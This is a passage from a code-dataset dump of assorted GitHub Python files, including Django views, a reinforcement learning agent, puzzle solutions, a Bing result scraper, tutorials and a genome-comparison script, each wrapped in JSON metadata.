else:\n return qset\n return qset\n\n\nclass FavoritesHomeTemplateView(generic_views.ListView):\n template_name = 'favorites/favorites_page.html'\n context_object_name = 'favorites'\n\n def post(self, request, **kwargs):\n print(self.request.POST)\n home = self.request.POST.get('homepk')\n next_page = request.POST.get('next')\n if len(self.request.user.favorites.filter(pk=home)) > 0:\n Favorites.objects.get(list=home).delete()\n return HttpResponseRedirect(next_page)\n else:\n newfav = Favorites(user=self.request.user, list=Home.objects.get(pk=home))\n newfav.save()\n return HttpResponseRedirect(next_page)\n\n def get_queryset(self):\n return self.request.user.favorites.all()\n\n\nclass SearchHomesTemplateView(generic_views.ListView):\n template_name = 'search/search_page.html'\n context_object_name = 'results'\n\n def get_queryset(self):\n qset = Home.objects.all()\n params = self.request.GET\n if params:\n\n if params['totalbeds'] and params['totalbeds'] != '':\n qset = qset.filter(\n Q(numofbeds__icontains=params['totalbeds'])\n )\n\n if params['totalbaths'] and params['totalbaths'] != '':\n qset = qset.filter(Q(numofbaths__icontains=params['totalbaths'])\n )\n\n if params['pricerangestart'] and params['pricerangestart'] != '':\n qset = qset.filter(Q(price__gte=params['pricerangestart'])\n )\n\n if params['pricerangestop'] and params['pricerangestop'] != '':\n qset = qset.filter(Q(price__lte=params['pricerangestop'])\n )\n\n if params['pricerangestart'] and params['pricerangestop'] and params['pricerangestart'] != '' and \\\n params['pricerangestop'] != '':\n qset = qset.filter(Q(price__range=(params['pricerangestart'], params['pricerangestop'])))\n\n if params['q']:\n # Poor mans search endpoint\n search_term = params['q'].strip()\n\n qset = qset.filter(\n Q(title__icontains=search_term) |\n Q(city__icontains=search_term) |\n Q(street__icontains=search_term) |\n Q(mlsnumber__number__icontains=search_term)\n )\n return qset.distinct()\n return qset\n\n\nclass ContactsTemplateView(generic_views.ListView):\n template_name = 'contacts/contacts_page.html'\n context_object_name = 'contacts'\n\n def get_queryset(self):\n return ContactInfo.objects.first()\n","repo_name":"Sfebtyler/Real-estate-project","sub_path":"backend/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"22296609702","text":"import gym\nimport argparse\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\n\ndef parse_args():\n desc = \"Implementation of temporal difference methods for discrete OpenAI Gym enviornments\" \n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument('--env', type=str, help='Gym Environment. Must be discrete in action space and observation space. Observation space can be tuple of discrete spaces.', default='FrozenLake-v0')\n\n parser.add_argument('--method', type=str, default='q_learning', choices=['sarsa', 'q_learning'], help='Temporal difference method to determine action-value function and policy.')\n\n parser.add_argument('--episodes', type=int, default=10000, help='Total number of game episodes')\n\n parser.add_argument('--render', type=bool, default=False, help='Render the game environment.')\n\n parser.add_argument('--gamma', type=float, default=0.95, help='Discout factor.')\n\n parser.add_argument('--epsilon', type=float, default=1.0, help='Starting value for epsilon, the random action probability.')\n\n parser.add_argument('--epsilon_taper', type=float, default=0.01, help='Rate to decrease epsilon over each episode.')\n\n parser.add_argument('--alpha', type=float, default=0.1, help='Learning rate.')\n\n parser.add_argument('--alpha_taper', type=float, default=0.01, help='Rate to decrease alpha over each visit to a state-action pair.')\n\n args = parser.parse_args()\n\n return args\n\nclass TDagent(object):\n def __init__(self, env, args=None):\n self.states = self._init_states(env)\n self.nA = env.action_space.n\n self.method = args.method\n self.Q = defaultdict(lambda: np.zeros(self.nA))\n self.policy = { s: np.random.randint(self.nA) for s in self.states }\n self.behavior = {}\n self.count = defaultdict(lambda: np.zeros(self.nA))\n self.gamma = args.gamma\n self.epsilon = args.epsilon\n self.epsilon_taper = args.epsilon_taper\n self.alpha = args.alpha\n self.alpha_taper = args.alpha_taper\n self.t = 0\n self.set_behavior()\n\n def _init_states(self, env):\n if type(env.observation_space) == gym.spaces.Tuple:\n states = list(product(*[list(range(space.n)) for space in env.observation_space.spaces]))\n pass\n else:\n states = list(range(env.observation_space.n))\n return states\n\n def set_behavior(self):\n self.t += 1\n epsilon = self.epsilon/(1 + self.epsilon_taper * self.t)\n for s in self.states:\n self.behavior[s] = np.ones(self.nA, dtype=float) * self.epsilon/self.nA\n self.behavior[s][self.policy[s]] += (1-self.epsilon)\n\n def choose_action(self, s):\n return np.random.choice(self.nA, p=self.behavior[s])\n\n def update_policy(self, state, action, reward, next_state, next_action=None):\n self._update_Q(state, action, reward, next_state, next_action)\n self._set_policy()\n\n def _update_Q(self, state, action, reward, next_state, next_action):\n next_Q = { \n \"sarsa\": self.Q[next_state][next_action], \n \"q_learning\": np.argmax(self.Q[next_state])\n }[self.method]\n self.count[state][action] += 1\n alpha = self.alpha/(1 + self.alpha_taper * self.count[state][action])\n self.Q[state][action] += alpha * (reward + self.gamma*next_Q - self.Q[state][action])\n\n def _set_policy(self):\n for s in self.states:\n self.policy[s] = np.argmax(self.Q[s])\n\n\ndef main():\n args = parse_args()\n\n print('Creating game environment for {}...'.format(args.env))\n env = gym.make(args.env)\n\n print('Creating agent...')\n agent = TDagent(env=env, args=args)\n\n print('Training 
agent...')\n episode_reward = []\n for e in range(args.episodes):\n total_reward = 0\n done = False\n state = env.reset()\n action = agent.choose_action(state)\n while not done:\n if args.render: \n env.render()\n next_state, reward, done, _ = env.step(action)\n next_action = agent.choose_action(state)\n agent.update_policy(state, action, reward, next_state, next_action)\n total_reward += reward\n state = next_state\n action = next_action\n agent.set_behavior()\n episode_reward.append(total_reward)\n print('Average Reward from {} Episodes: {}'.format(args.episodes, np.mean(episode_reward)))\n plt.plot(episode_reward, 'o')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ahlad-reddy/reinforcement-learning-gym","sub_path":"temporal_difference.py","file_name":"temporal_difference.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14127830212","text":"class Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n ans = 0\n beg = 0\n dic = {}\n if s is None:\n return 0\n # m 1\n for i in range(len(s)):\n if s[i] in dic and beg <=dic[s[i]]:# 防止beg往前跑,下面的t\n beg=dic[s[i]]+1\n else:\n ans =max(ans,i-beg+1)\n dic[s[i]] = i\n return ans\nif __name__ == '__main__':\n a=Solution().lengthOfLongestSubstring(\"tmmzuxt\")\n print(a)","repo_name":"fengben/ShuaLeetCode","sub_path":"3/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72197192489","text":"\"\"\"\nCode from https://github.com/ray-project/ray/blob/ray-0.8.7/rllib/agents/dqn/learner_thread.py\nand https://github.com/ray-project/ray/blob/ray-0.8.7/rllib/utils/window_stat.py\n\"\"\"\nfrom __future__ import annotations\n\nimport queue\nimport threading\n\nfrom ray.util.timer import _Timer as TimerStat\n\nfrom muzero.metrics import get_learner_stats\nfrom muzero.policy import LEARNER_STATS_KEY\nfrom muzero.sample_batch import DEFAULT_POLICY_ID\n\nLEARNER_QUEUE_MAX_SIZE = 8\n\n\nimport numpy as np\n\n\nclass WindowStat:\n def __init__(self, name, n):\n self.name = name\n self.items = [None] * n\n self.idx = 0\n self.count = 0\n\n def push(self, obj):\n self.items[self.idx] = obj\n self.idx += 1\n self.count += 1\n self.idx %= len(self.items)\n\n def stats(self):\n if not self.count:\n _quantiles = []\n else:\n _quantiles = np.nanpercentile(self.items[:self.count],\n [0, 10, 50, 90, 100]).tolist()\n return {\n self.name + \"_count\": int(self.count),\n self.name + \"_mean\": float(np.nanmean(self.items[:self.count])),\n self.name + \"_std\": float(np.nanstd(self.items[:self.count])),\n self.name + \"_quantiles\": _quantiles,\n }\n\n\nclass LearnerThread(threading.Thread):\n \"\"\"Background thread that updates the local model from replay data.\n The learner thread communicates with the main thread through Queues. This\n is needed since Ray operations can only be run on the main thread. 
In\n addition, moving heavyweight gradient ops session runs off the main thread\n improves overall throughput.\n \"\"\"\n\n def __init__(self, local_worker):\n threading.Thread.__init__(self)\n self.learner_queue_size = WindowStat(\"size\", 50)\n self.local_worker = local_worker\n self.inqueue = queue.Queue(maxsize=local_worker.config['learner_queue_size'])\n self.outqueue = queue.Queue()\n self.queue_timer = TimerStat()\n self.grad_timer = TimerStat()\n self.overall_timer = TimerStat()\n self.daemon = True\n self.weights_updated = False\n self.stopped = False\n self.stats = {}\n\n def run(self):\n while not self.stopped:\n self.step()\n\n def step(self):\n with self.overall_timer:\n with self.queue_timer:\n ra, batch = self.inqueue.get()\n if batch is not None:\n prio_dict = {}\n with self.grad_timer:\n info = self.local_worker.learn_on_batch(batch)\n pid = DEFAULT_POLICY_ID\n p = info.get(\n \"replay_p\",\n info[LEARNER_STATS_KEY].get(\"replay_p\"))\n prio_dict[pid] = (batch.data.get(\"batch_indexes\"), p)\n self.stats[pid] = get_learner_stats(info)\n self.grad_timer.push_units_processed(batch.count)\n self.outqueue.put((ra, prio_dict, batch.count))\n self.learner_queue_size.push(self.inqueue.qsize())\n self.weights_updated = True\n self.overall_timer.push_units_processed(batch and batch.count\n or 0)","repo_name":"expz/muzero-ray","sub_path":"muzero/learner_thread.py","file_name":"learner_thread.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31189354273","text":"l,d=input().split( )\nx=int(l)\ny=int(d)\nfor num in range(x,y):\n\tpower=len(str(num))\n\tsum=0\n\ttemp=num\n\twhile temp>0:\n\t\tdigit=temp%10\n\t\tsum=sum+digit**power\n\t\ttemp//=10\n\tif num==sum:\n\t\tprint(num)\n","repo_name":"Dhamodhiran/dhamu","sub_path":"case18.py","file_name":"case18.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3699918741","text":"from . 
import views\n\nfrom django.urls import path\n\nurlpatterns = [\n path(\"\", views.index, name=\"friendship_index\"),\n path(\"show_friends\", views.show_friends, name=\"show_friends\"),\n path(\"add_friend\", views.add_friend, name=\"add_friend\"),\n path(\"show_requests\", views.show_requests, name=\"show_requests\"),\n path(\"check_status\", views.check_status, name=\"check_status\"),\n\n path(\"accept\", views.accept, name=\"accept\"),\n path(\"reject\", views.reject, name=\"reject\"),\n path(\"withdraw\", views.withdraw, name=\"withdraw\"),\n\n path(\"delete_friend\", views.delete_friend, name=\"delete_friend\"),\n path(\"send_message\", views.send_message, name=\"send_message\")\n]","repo_name":"NikiTesla/vk_test","sub_path":"friendship/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70732497767","text":"#!/usr/bin/env python3\n\nfrom collections import Counter, defaultdict\nimport string\nimport sys\n\nwith open(\"day18_i.txt\", \"r\") as f:\n map_ = [[c for c in l if c != '\\n'] for l in f.readlines()]\n\nclass Area:\n def __init__(self, map_, xs=None, ys=None):\n self.map = map_\n\n self.width = len(map_[0])\n self.height = len(map_)\n if xs is None:\n self.xstart = 0\n self.xend = self.width\n else:\n self.xstart = xs[0]\n self.xend = xs[1]\n\n if ys is None:\n self.ystart = 0\n self.yend = self.height\n else:\n self.ystart = ys[0]\n self.yend = ys[1]\n\n def show(self, pos=None):\n sys.stderr.write(\"AREA MAP\\n\\n\")\n for y in range(self.ystart, self.yend):\n for x in range(self.xstart, self.xend):\n obj = self.map[y][x]\n if pos is not None and pos[0] == x and pos[1] == y:\n sys.stderr.write(\"=\")\n else:\n sys.stderr.write(obj)\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n\n def foreach(self, find_func):\n for y in range(self.ystart, self.yend):\n for x in range(self.xstart, self.xend):\n find_func(x, y, self.map[y][x])\n\n def get(self, pos):\n return self.map[pos[1]][pos[0]]\n\n def set(self, pos, tile):\n self.map[pos[1]][pos[0]] = tile\n\n def is_key(self, pos):\n return self.get(pos) in string.ascii_lowercase\n\n def is_door(self, pos):\n return self.get(pos) in string.ascii_uppercase\n\n def in_area(self, pos):\n return (pos[0] >= self.xstart and pos[0] < self.xend\n and pos[1] >= self.ystart and pos[1] < self.yend)\n\n def vicinity(self, pos):\n candidates = [\n (pos[0] + 1, pos[1]),\n (pos[0] - 1, pos[1]),\n (pos[0], pos[1] + 1),\n (pos[0], pos[1] - 1)\n ]\n return [p for p in candidates\n if self.in_area(p)]\n\ndef find_obj(area, target):\n found = []\n def _find_obj(x, y, obj):\n if obj == target:\n found.append((x,y))\n area.foreach(_find_obj)\n return found\n\ndef find_keys(area):\n found = set()\n def _find_obj(x, y, obj):\n if obj in string.ascii_lowercase:\n found.add(obj)\n area.foreach(_find_obj)\n return found\n\ndef walkable(tile, keys, doors=string.ascii_uppercase):\n if tile == \"#\":\n return False\n elif tile in string.ascii_lowercase:\n return True\n elif tile.lower() in keys:\n return True\n elif tile in doors:\n return False\n elif tile == \".\":\n return True\n elif tile == \"@\":\n return True\n else:\n return True\n #assert False\n\ndef add_key(tile, keys):\n if tile in string.ascii_lowercase:\n return frozenset(keys | {tile})\n else:\n return keys\n\n#visited = defaultdict(list)\n#\n# This class registers interesting paths to all maze points\n#class BestPaths:\n# def __init__(self):\n# self.visited = 
defaultdict(list)\n#\n# def new_path(self, pos, length, keys):\n# useless = False\n# new_paths = []\n#\n# # Find similar paths reaching this point\n# # In the process we remove any previous path that's not interesting\n# # anymore\n# for best_length, with_keys in self.visited[pos]:\n# if keys <= with_keys:\n# useless = True\n#\n# if with_keys <= keys and best_length + 1 >= length:\n# continue\n# new_path.append((best_length, with_keys))\n#\n# if not useless:\n# new_paths.append((length, keys))\n# self.visited[pos] = new_paths\n# return True\n# else:\n# return False\n\nclass MazeBot:\n def __init__(self, area, start_pos):\n self.area = area\n\n self.all_keys = find_keys(self.area)\n self.all_doors = set([c.upper() for c in list(self.all_keys)])\n self.visited = defaultdict(list)\n self.distance = 0\n self.cur_points = [(frozenset(), 0, start_pos)]\n self.max_keys = 0\n self.done = False\n self.static_points = set()\n\n def state(self):\n if self.done:\n return [(self.all_keys, self.distance)]\n else:\n return [(keys, dst) for (keys, dst, _) in list(self.static_points) if dst != 0]\n\n def inject(self, state):\n if self.done:\n return 0\n\n for keys, dst, pos in list(self.static_points):\n for (ext_keys, ext_dst) in state:\n self.cur_points.append((keys | ext_keys, dst + ext_dst, pos)) \n\n def filter_useless(self, points):\n actual_points = []\n for new_point in points:\n if new_point[0] >= self.all_keys:\n self.distance = new_point[1]\n sys.stderr.write(\"Collected all keys {} / took {} steps\\n\"\n .format(self.all_keys, new_point[1]))\n self.done = True\n return 1\n if len(new_point[0]) > self.max_keys:\n self.max_keys = len(new_point[0])\n #sys.stderr.write(\"Got {} keys {}\\n\".format(self.max_keys, new_point[0]))\n sys.stderr.write(\"Including {}\\n\".format(self.all_keys & new_point[0]))\n print(\"Path heads {}\".format(len(points)))\n\n useless = False\n new_keys = set()\n for keys in self.visited[new_point[2]]:\n if new_point[0] <= keys:\n useless = True\n\n if keys <= new_point[0]:\n continue\n new_keys |= {keys}\n\n if not useless:\n new_keys |= {new_point[0]}\n self.visited[new_point[2]] = new_keys\n actual_points.append(new_point)\n return actual_points\n\n def progress(self):\n if self.done:\n return 1\n\n next_points = []\n for keys, dst, pos in self.cur_points:\n next_points += [(add_key(self.area.get(p), keys), dst + 1, p)\n for p in self.area.vicinity(pos)\n #if ((keys, p) not in visited.keys()\n if walkable(self.area.get(p), keys,\n doors=self.all_doors)]\n\n nearby_doors = set()\n # Keep points of interest available. 
When we see a wall, just wait\n # there in case another bot unlocks it for us\n for keys, dst, pos in self.cur_points:\n doors = [self.area.get(p)\n for p in self.area.vicinity(pos)\n if self.area.is_door(p)]\n if doors != []:\n nearby_doors |= set(doors)\n self.static_points |= {(frozenset(self.all_keys & keys), dst, pos)}\n\n actual_points = self.filter_useless(next_points)\n if actual_points == []:\n print(\"out of options, nearby doors: {}\".format(nearby_doors))\n return -1\n\n self.cur_points = actual_points\n\n return 0\n\n\narea = Area(map_)\nstart_pos = find_obj(area, \"@\")[0]\n\narea.show()\n\n# Fix center of maze for p2\nfor pos in area.vicinity(start_pos):\n area.set(pos, \"#\")\narea.set(start_pos, \"#\")\nsub_areas = []\nfor i, j in [(a, b) for a in [1, -1] for b in [1, -1]]:\n area.set((start_pos[0] + i, start_pos[1] + j), \"@\")\n\n if i == -1:\n xs = (0, start_pos[0] + 1)\n else:\n xs = (start_pos[0], area.width)\n if j == -1:\n ys = (0, start_pos[1] + 1)\n else:\n ys = (start_pos[1], area.height)\n\n sub_area = Area(area.map, xs, ys)\n\n sub_areas.append(((start_pos[0] + i, start_pos[1] + j), sub_area))\n sub_area.show()\n\n#start_pos = find_obj(area, \"@\")\n#area.show()\nprint(start_pos)\n\n# Instantiate vault bots\nbots = [MazeBot(area, pos) for pos, area in sub_areas]\n\nfor bot in bots:\n sys.stderr.write(\"Keys {}\\n\".format(bot.all_keys))\n\nfor i, bot in enumerate(bots):\n print(\"Advance bot {}\".format(i))\n while bot.progress() == 0:\n pass\n\nfor it in range(0,10):\n for i, bot in enumerate(bots):\n inject_state = [to_inject\n for other_bot in bots\n for to_inject in other_bot.state()\n if other_bot != bot]\n\n print(\"Advance bot {}\".format(i))\n print(\"Inject other bots state {}\".format(len(inject_state)))\n #print(inject_state)\n\n bot.inject(inject_state)\n while bot.progress() == 0:\n pass\n\n print(\"Bot {} state {}\".format(i, len(bot.state())))\n\n all_done = True \n for bot in bots:\n if not bot.done:\n all_done = False\n\n if all_done:\n print(\"Collected all keys accross bots\")\n sys.exit(0)\n\n #print(bot.state())\n\n#bot = MazeBot(area, start_pos)\n#while bot.progress() == 0:\n# pass\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day18/day18_2.py","file_name":"day18_2.py","file_ext":"py","file_size_in_byte":8931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13594957355","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport lxml\r\nimport csv\r\nimport pandas as pd\r\n\r\nheaders = {\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582\"\r\n}\r\n\r\nkeywords = pd.read_csv('D:\\\\xampp\\\\htdocs\\\\Python\\\\Test\\\\duck\\\\input.csv', header=0, index_col=None)\r\n\r\ndf = pd.DataFrame(columns=['keyword', 'url'])\r\n\r\nfor keyword in keywords['keywords']:\r\n print(keyword)\r\n response = requests.get(\"https://www.bing.com/search?form=QBRE&q=\" + keyword, headers=headers).text\r\n soup = BeautifulSoup(response, 'lxml')\r\n for j in soup.select('.b_algo h2 a', limit=1):\r\n link = j['href']\r\n print(link)\r\n df = df.append({'keyword': keyword, 'url': link}, ignore_index=True) \r\n\r\ndf.to_csv(r'D:\\\\xampp\\\\htdocs\\\\Python\\\\Test\\\\duck\\\\final_dataset.csv', index=False)\r\n\r\ninput(\" press close to exit 
\")","repo_name":"susheelseth/Bing-search-scraping-data-from-multiple-queries-from-a-csv-file","sub_path":"bing.py","file_name":"bing.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30449184692","text":"\"\"\"\nSorted\n\nOBS: Não confunda, apesar do nome, com a função sort() que já estudamos em Listas. \no sort() so funciona em listas.\n\nPodemos utilizar o sorted() com qualquer iterável\n\nComo o próprio nome diz. sorted() serve para ordenar.\n\"\"\"\n\ntupla = 7, 2, 3\n\n# print(tupla.sort()) # erro de atributo\n\nprint(sorted(tupla)) # sorted retorna uma nova lista a original se matém intacta...\nprint(tupla)\n\n# Adicionando parâmetros ao sorted()\nnumeros = [1, 4, 5, 7, 2, 3]\n\nprint(sorted(numeros, reverse=True))# Ordena do maior para o menor\n\n# Podemos utilizar o sorted() para coisas mais complexas\n\n\nusuarios = [\n {\"username\": \"Samuel\", \"tweets\": [\"Eu adoro bolos\", \"Eu adoro pizzas\"]},\n {\"username\": \"Bob\", \"tweets\": [\"So jogo video-game\", \"Dormo 3 horas por dia\"]},\n {\"username\": \"Carla\", \"tweets\": [\"Odeio meus irmãos\"], \"cor\": \"Amarelo\"},\n {\"username\": \"Rafaela\", \"tweets\": [\"Passei em primeiro no Enem\", \"Bio-Ciência\"]},\n {\"username\": \"Fernando\", \"tweets\": []},\n {\"username\": \"Liniker\", \"tweets\": [\"One piece é vida\"], \"cor\": \"perto\", \"musica\": \"Rock\"}\n\n]\n\n# Ordenar pelo tamanho do dicionario\nprint(usuarios)\nprint(sorted(usuarios, key=lambda usuario : usuario['username'], reverse=True))\n\n# Ordenando por número de tweets\nprint(\" POR TWEETS \\n\")\nprint(sorted(usuarios, key=lambda usuario : len(usuario['tweets'])))\n\n\n# Último exemplo\n\nmusicas = [\n {'titulo': \"Thunderstruck\", \"tocou\": 3},\n {'titulo': \"Nothing else matters\", \"tocou\": 6},\n {'titulo': \"Insdestructible\", \"tocou\": 1},\n {'titulo': \"November Rain\", \"tocou\": 2},\n]\n\n# Ordena da menos tocada para a mais tocada\nprint(sorted(musicas, key=lambda musica: musica['tocou']))\n\nprint(sorted(musicas, key=lambda musica: musica['tocou'], reverse=True))","repo_name":"linikerunk/python-as-well","sub_path":"geek-universe/sorted.py","file_name":"sorted.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15001730508","text":"# Refund Cost Calculator by Jason Rousell\r\n# 9/9/2022\r\n# In wake of professor strike, this small tool calculates how much money\r\n# you have wasted, or that the university has wasted, while you\r\n# weren't able to attend class.\r\n\r\n# This tool doesn't account for online fees, other course fees, or material costs. Add those if you want\r\n\r\ntotalCredit = int(input(\"Type the total amount of credit hours that you are taking.\\n\\n\"))\r\nclassCredit = int(input(\"Type the amount of credit hours for this class. Most classes are worth three credit hours, \"\r\n \"but some are worth more.\\n\\n\"))\r\nclassDays = int(input(\"Type how many days a week you have this class. EX: If you have this class on Monday and \"\r\n \"Wednesday, type 2.\\n\\n\")) * 14\r\n\r\n# This project assumes that total class days in a semester = 14 days for each weekday (14 Mondays, 14 Tuesdays, etc.)\r\n\r\ndaysMissed = int(input(\"Type how many days of this class you have missed. 
Do not count holidays or other similar \"\r\n \"break days.\\n\\n\"))\r\ngradUndergrad = int(input(\"If the class is counted in UNDERGRADUATE credits (level 100-499), type 1. \\nIf the class is \"\r\n \"counted in GRADUATE credits, AND the class is course level 500-699, type 2. \\nIf the class \"\r\n \"is counted in GRADUATE credits, AND the class is course level 700+, type 3.\\n\\n\"))\r\nresidentNon = int(input(\"Are you a resident of Michigan? Type 1 or 2 for \\\"yes\\\" or \\\"no\\\".\\n\\n\"))\r\n\r\n# Residents vs. Non-Residents have different rates at the Graduate level only\r\n\r\nif gradUndergrad == 1:\r\n if totalCredit < 12:\r\n creditCost = (608 * classCredit)\r\n if 12 <= totalCredit <= 16:\r\n creditCost = 7250\r\n if totalCredit >= 17:\r\n creditCost = 7250 + (608 * (totalCredit - 16))\r\n\r\nif gradUndergrad == 2:\r\n if residentNon == 1:\r\n creditCost = (938.50 * classCredit)\r\n if residentNon == 2:\r\n creditCost = (1626.50 * classCredit)\r\n\r\nif gradUndergrad == 1:\r\n if residentNon == 1:\r\n creditCost = (1074.00 * classCredit)\r\n if residentNon == 2:\r\n creditCost = (1834.00 * classCredit)\r\n\r\ndailyCost = creditCost / classDays\r\n\r\nrefundNeeded = round(dailyCost * daysMissed, 2)\r\n\r\nprint(\"Here's the math: you deserve a refund of\", refundNeeded,\"for the classes you've missed.\")","repo_name":"psyhost22/EMURefundCalculator","sub_path":"refund.py","file_name":"refund.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27946357585","text":"with open(\"fifa.txt\", 'r', encoding='latin2') as f:\r\n lista = list()\r\n fejlec = f.readline()\r\n for sor in f:\r\n lista.append(sor.strip().split(\";\"))\r\n \r\n#3. feladat\r\nprint(f'3. feladat: A világranglistán {len(lista)} csapat szerepel')\r\n\r\n#4. feladat\r\n\r\nöp = sum( [int(sor[3]) for sor in lista] )\r\növ = len(lista)\r\n\r\nátlag = öp/öv\r\n\r\nprint(f'4. feladat: A csapatokátlagos pontszáma: {átlag} pont')\r\n\r\n#5. feladat\r\nvaltozas0 = 0\r\nhelyezes0 = 0\r\nfor csapat, helyezes, valtozas, pontszam in lista:\r\n if int(valtozas) > valtozas0:\r\n valtozas0 = int(valtozas)\r\n #if int(valtozas) > valtozas0:\r\n pontszam0 = pontszam\r\n csapat0 = csapat\r\n helyezes0 = helyezes\r\n\r\nprint(f'5. feladat: A legtöbbbet javító csapat:')\r\nprint(f' Helyezés: {helyezes0} ')\r\nprint(f' Csapat: {csapat0} ')\r\nprint(f' Pontszám: {pontszam0} ')\r\n\r\n#6. feladat\r\nszamlalo = 0\r\nfor csapat, helyezes, valtozas, pontszam in lista:\r\n if csapat == 'Magyarország':\r\n szamlalo += 1\r\nif szamlalo > 0:\r\n print(f'6. feladat: A csapatok között van Magyarország')\r\nif szamlalo == 0:\r\n print(f'6. feladat: A csapatok között nincs Magyarország')\r\n\r\n#7. feladat\r\nimport collections\r\n\r\ngyujto = collections.Counter()\r\n\r\nfor csapat, helyezes, valtozas, pontszam in lista:\r\n gyujto[valtozas] += 1\r\nprint(f'7. feladat: Statisztika')\r\nfor valtozas, darab in gyujto.items():\r\n if darab > 1:\r\n print(f' {valtozas} helyet véltozott: {darab} csapat')","repo_name":"Tamas9c/OkjFIFA","sub_path":"FIFAvilagranglista.py","file_name":"FIFAvilagranglista.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38532069797","text":"import CoronaTracker\nimport sqlite3\nimport csv\n\ndef run():\n \"\"\"Main execution method for the module. 
Will take the information stored in the database to appropriately\n analyze the sequences and find their closest relative via FOGSAA.\n NOTE: GenerateSQL.py must be run prior to this module.\"\"\"\n\n conn = sqlite3.connect('Sequences.db')\n curs_main = conn.cursor()\n curs_supp = conn.cursor()\n sql_index = 2\n spreads = []\n\n \"\"\"This section will loop through every sequence available in the details table, retrieve its sequence\n as well as the sequences of any samples which have come in the prior 40 days (days can be adjusted)\n and then compare them to find the primary sample's best match, storing the two as a spread in a list.\"\"\"\n\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n #Only retrieve information on sequences which have a date and sequence available.\n while current_row and current_row[2]:\n curs_main.execute('''SELECT genome FROM nucleotides WHERE id=?;''', [current_row[0]])\n current_genome = curs_main.fetchone()\n if not current_genome:\n sql_index += 1\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n continue\n oldest_time = CoronaTracker.ComparisonUtility.getStopDate(current_row[2], days=40)\n curs_main.execute('''SELECT id, location FROM details WHERE date < ? AND date > ?;''',\n [current_row[2], oldest_time])\n current_best = [None, -100000]\n for row in curs_main.fetchall():\n curs_supp.execute('''SELECT genome FROM nucleotides WHERE id=?;''', [current_row[0]])\n compared_genome = curs_supp.fetchone()[0]\n if not compared_genome:\n continue\n likeness_score = CoronaTracker.ComparisonUtility.compareSequences(current_genome, compared_genome)\n if likeness_score > current_best[1]:\n current_best = [row[0], likeness_score]\n main_sequence = CoronaTracker.Sequence(current_row[0], current_row[1])\n curs_supp.execute('''SELECT * FROM details WHERE id=?;''', [current_best[0]])\n ancestor = curs_supp.fetchone()\n if not ancestor:\n sql_index += 1\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n continue\n ancestor_sequence = CoronaTracker.Sequence(ancestor[0], ancestor[1])\n spreads.append(CoronaTracker.Spread(start_seq=ancestor_sequence, end_seq=main_sequence))\n\n sql_index += 1\n curs_main.execute('''SELECT * FROM details WHERE rowid=?;''', [sql_index])\n current_row = curs_main.fetchone()\n print('Analyzing row:\\n' + str(current_row))\n\n curs_supp.close()\n\n #Once all samples have been analyzed, stores the list of spreads in the spreads table.\n for spread in spreads:\n print('Inserting spread into DB:' + str(spread))\n curs_main.execute('''INSERT INTO spreads VALUES (?, ?, ?, ?, ?);''',\n [spread.start_id, spread.end_id, spread.start_loc, spread.end_loc, spread.strength])\n conn.commit()\n conn.close()\n\nif __name__ == \"__main__\":\n run()","repo_name":"WhiteWalz/CoronaTracker","sub_path":"Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71722818409","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras import backend as K\n\n\n# In[2]:\n\n\n\nsmooth = 1.\n\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. 
